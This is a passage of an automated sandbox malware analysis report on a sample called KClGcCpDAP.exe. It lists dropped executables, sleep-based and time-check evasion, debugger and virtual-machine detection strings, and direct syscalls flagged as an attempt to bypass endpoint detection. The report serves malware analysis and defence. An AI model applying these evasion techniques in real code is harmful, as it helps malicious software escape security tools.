                  Switches to a custom stack to bypass stack traces
                  Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6CF53B54
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_6665BAC4 rdtsc 2_2_6665BAC4
                  Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bewwwyJump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jamulieilmfjkkJump to dropped file
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeDropped PE file which has not been started: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Ammonium.dllJump to dropped file
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeEvaded block: after key decision
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeEvaded block: after key decision
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeEvasive API call chain: GetLocalTime,DecisionNodes
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeAPI coverage: 4.5 %
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeAPI coverage: 0.3 %
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe TID: 7148Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe TID: 5852Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe TID: 1608Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe TID: 4048Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe TID: 6024Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_008AFEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 008AFF61h0_2_008AFEC6
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_008AFEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 008AFF5Ah0_2_008AFEC6
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D3FEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 00D3FF61h1_2_00D3FEC6
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D3FEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 00D3FF5Ah1_2_00D3FEC6
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_00873CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,0_2_00873CC4
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_008B4440 FindFirstFileW,FindClose,0_2_008B4440
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_00889B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,0_2_00889B43
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D44440 FindFirstFileW,FindClose,1_2_00D44440
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D19B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,1_2_00D19B43
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D03CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,1_2_00D03CC4
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666644A8 _errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,SetErrorMode,2_2_666644A8
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666663E4 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,2_2_666663E4
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666683E8 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExW,_errno,_errno,_errno,_errno,_errno,IsRootUNCName,GetDriveTypeW,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,2_2_666683E8
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666623A0 FindClose,FindFirstFileExA,FindNextFileA,FindClose,2_2_666623A0
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66665EE8 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,2_2_66665EE8
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66663F10 _errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,2_2_66663F10
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66667F84 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExW,_errno,_errno,_errno,_errno,_errno,IsRootUNCName,GetDriveTypeW,free,free,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,2_2_66667F84
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66662C0C FindClose,FindFirstFileExW,FindNextFileW,FindClose,2_2_66662C0C
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66666DDC __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,2_2_66666DDC
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66667B1C __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExW,_errno,_errno,_errno,_errno,_errno,IsRootUNCName,GetDriveTypeW,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,2_2_66667B1C
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_6666885C __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExW,_errno,_errno,_errno,_errno,_errno,IsRootUNCName,GetDriveTypeW,free,free,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,2_2_6666885C
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666668D8 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,2_2_666668D8
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666649E4 _errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,2_2_666649E4
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_008B97A5 VirtualQuery,GetSystemInfo,0_2_008B97A5
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeThread delayed: delay time: 30000Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                  Source: Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: http://www.vmware.com/schema/ovf/1/envelope
                  Source: Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: uuidvbox:uuid%RTuuidovf:formathttp://www.vmware.com/specifications/vmdk.html#sparsehttp://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimizedovf:fileRefovf:diskIdovf:capacityDiskovf:hrefFilefile%RI32VMDKLogical network used by this appliance.ovf:nameExportedVirtualBoxMachinesVirtualSystemCollectionCannot export more than one virtual system with OVF 0.9, use OVF 1.0Logical networks used in the packageNetworkSectionovf:NetworkSection_TypeList of the virtual disks used in the packageDiskSectionovf:DiskSection_TypeReferencesxmlns:vboxhttp://www.virtualbox.org/ovf/machinexmlns:xsihttp://www.w3.org/2001/XMLSchema-instancexmlns:vssdhttp://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_VirtualSystemSettingDataxmlns:rasdhttp://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingDataxmlns:ovfxmlnshttp://schemas.dmtf.org/ovf/envelope/1http://www.vmware.com/schema/ovf/1/envelopexml:langen-USovf:version0.92.0Envelope"
                  Source: Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: %s/VBoxGuestAdditions_%ls.iso
                  Source: cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
                  Source: Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: /additions/VBoxGuestAdditions.iso
                  Source: cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
                  Source: Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: using the native ring-0 loaderpLoadReq->u.In.cbStrTab == CalcArgs.cbStrings(size_t)(CreateArgs.pSym - (PSUPLDRSYM)&pLoadReq->u.In.abImage[offSymTab]) <= CalcArgs.cSymbols(size_t)(CreateArgs.psz - CreateArgs.pszBase) <= CalcArgs.cbStringsint __cdecl supLoadModule(const char *,const char *,const char *,void **)ModuleTermModuleInitVMMR0EntryExVMMR0EntryFastVMMR0EntryIntsupLoadModule returned %RrcVBoxDrvVBox Support Driver\VBoxDrv.sys\\.\VBoxDrvVBoxNetDHCP.dllVBoxNetDHCP.exevboxwebsrv.exeVBoxBFE.dllVBoxBFE.exeVBoxSDL.dllVBoxSDL.exeVirtualBox.dllVirtualBox.exeVBoxVideoRecFB.dllVBoxHeadless.dllVBoxHeadless.exeVBoxVRDP.dllVBoxAuth.dllVRDPAuth.dllVBoxC.dllVBoxSVC.exeVBoxManage.exeVBoxOGLrenderspu.dllVBoxOGLhosterrorspu.dllVBoxOGLhostcrutil.dllVBoxSharedCrOpenGL.dllVBoxHostChannel.dllVBoxGuestControlSvc.dllVBoxGuestPropSvc.dllVBoxDragAndDropSvc.dllVBoxSharedFolders.dllVBoxSharedClipboard.dllVBoxDbg3.dllVBoxDbg.dllVBoxDDU.dllVBoxDD2.dllVBoxDD.dllVBoxREM.dllVBoxVMM.dllVBoxRT.dllVBoxDD2GC.gcVBoxDDGC.gcVMMGC.gcVBoxDD2R0.r0VBoxDDR0.r0
                  Source: Virtual.exe, 00000002.00000003.1718068778.0000000001391000.00000004.00000001.00020000.00000000.sdmp, Virtual.exe, 00000002.00000000.1705595351.00007FF6C5953000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1781024865.00007FF718653000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: AdditionsFacilityType_VBoxTrayClient
                  Source: Virtual.exe, 00000003.00000002.1781024865.00007FF718653000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: aVmNetTx
                  Source: Virtual.exe, 00000003.00000002.1781024865.00007FF718653000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: aVmNetRx
                  Source: cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
                  Source: validPower_Lnz_x64.exe, 0000000A.00000002.2220545140.000000000041C000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2202511556.0000000000499000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2210919646.0000000000499000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2202888428.0000000000499000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2220545140.0000000000499000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2219569359.0000000000499000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
                  Source: Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: The service was disabled on the host. Returned by pfnInit in VBoxService to indicated a non-fatal error that should results in the particular service being disabled.
                  Source: cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
                  Source: Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: VBoxGuestPropSvc.dll
                  Source: Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: /VBoxGuestAdditions.iso
                  Source: Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: Given default machine Guest Additions ISO file '%s' does not existGiven default machine Guest Additions ISO file '%s' is not fully qualifiedCannot determine default Guest Additions ISO location. Most likely they are not available%s/VBoxGuestAdditions_%ls.iso/additions/VBoxGuestAdditions.iso/VBoxGuestAdditions.iso
                  Source: Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: Importing virtual disk image '%s'Could not find a valid medium format for the source disk '%s'http://www.vmware.com/interfaces/specifications/vmdk.html#compressedhttp://www.vmware.com/specifications/vmdk.html#compressedVDICreating disk image '%s'%s%c%sCould not find a valid medium format for the target disk '%s'"
                  Source: Virtual.exe, 00000003.00000002.1781024865.00007FF718653000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: AdditionsFacilityType_VBoxGuestDriverWWW
                  Source: cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
                  Source: Virtual.exe, 00000003.00000002.1781024865.00007FF718653000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: !0R4AdditionsFacilityType_VBoxServiceWWW
                  Source: Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: VBoxGuestControlSvc.dll
                  Source: Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: http://www.vmware.com/specifications/vmdk.html#compressed
                  Source: Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: IOCtl to VBoxGuest driver failed.
                  Source: Virtual.exe, 00000002.00000002.1725642901.00007FFDFB6C5000.00000002.00000001.01000000.0000000B.sdmp, Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: VBoxTray.exe
                  Source: Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: http://www.vmware.com/specifications/vmdk.html#sparse
                  Source: Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: http://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimized
                  Source: Virtual.exe, 00000002.00000002.1725642901.00007FFDFB6C5000.00000002.00000001.01000000.0000000B.sdmp, Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: Virtual HDD is not opened.
                  Source: Virtual.exe, 00000002.00000002.1725642901.00007FFDFB6C5000.00000002.00000001.01000000.0000000B.sdmp, Virtual.exe, 00000003.00000002.1781300513.00007FFDFB125000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: VBoxTray.exeexplorer.exeint __cdecl rtProcWinCreateAsUser1(unsigned short *,unsigned short *,unsigned short *,unsigned short *,struct RTENVINTERNAL *,unsigned long,struct _STARTUPINFOW *,struct _PROCESS_INFORMATION *,unsigned int)pfnCreateProcessWithLogonW (%p) failed: dwErr=%u (%#x), rc=%Rrc
                  Source: validPower_Lnz_x64.exe, 0000000A.00000003.2202511556.0000000000499000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2210919646.0000000000499000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2202888428.0000000000499000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2220545140.0000000000499000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2219569359.0000000000499000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW?
                  Source: Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: http://www.vmware.com/interfaces/specifications/vmdk.html#compressed
                  Source: Virtual.exe, 00000003.00000002.1781024865.00007FF718653000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: b!0R4AdditionsFacilityType_VBoxServiceWWW
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_6665BAC4 rdtsc 2_2_6665BAC4
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_0089E88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0089E88A
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_6E231400 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,1_2_6E231400
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_008A48D8 mov eax, dword ptr fs:[00000030h]0_2_008A48D8
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D348D8 mov eax, dword ptr fs:[00000030h]1_2_00D348D8
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_0087394F GetProcessHeap,RtlAllocateHeap,0_2_0087394F
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_0089E3D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0089E3D8
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_0089E88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0089E88A
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_0089E9DC SetUnhandledExceptionFilter,0_2_0089E9DC
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_008A3C76 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008A3C76
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D2E3D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00D2E3D8
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D2E88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00D2E88A
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D2E9DC SetUnhandledExceptionFilter,1_2_00D2E9DC
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D33C76 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00D33C76
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_665E6BB0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,__crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,__crt_debugger_hook,GetCurrentProcess,TerminateProcess,2_2_665E6BB0
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666B06B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_666B06B0
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_666B02A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_666B02A4

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Found direct / indirect Syscall (likely to bypass EDR)
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeNtAllocateVirtualMemory: Direct from: 0x7FFDFB329635Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtQuerySystemInformation: Direct from: 0x7FF69E3C6203Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtClose: Direct from: 0x14011D93E
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtClose: Direct from: 0x7FF69E535663
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtQuerySystemInformation: Direct from: 0x7FF69E45E26BJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtRequestWaitReplyPort: Direct from: 0x7FF69E466D34Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeNtClose: Direct from: 0xAF0E30
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtQueryAttributesFile: Direct from: 0x7FF6AB8AA87DJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeNtAllocateVirtualMemory: Direct from: 0x110Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtCreateFile: Direct from: 0x7FF6AB9703E5Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtClose: Indirect: 0x14012000F
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtProtectVirtualMemory: Direct from: 0x7FF69E3CF21CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtProtectVirtualMemory: Direct from: 0x7FF69E3AFF06Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exeNtCreateFile: Direct from: 0x7FF6AB80A602Jump to behavior
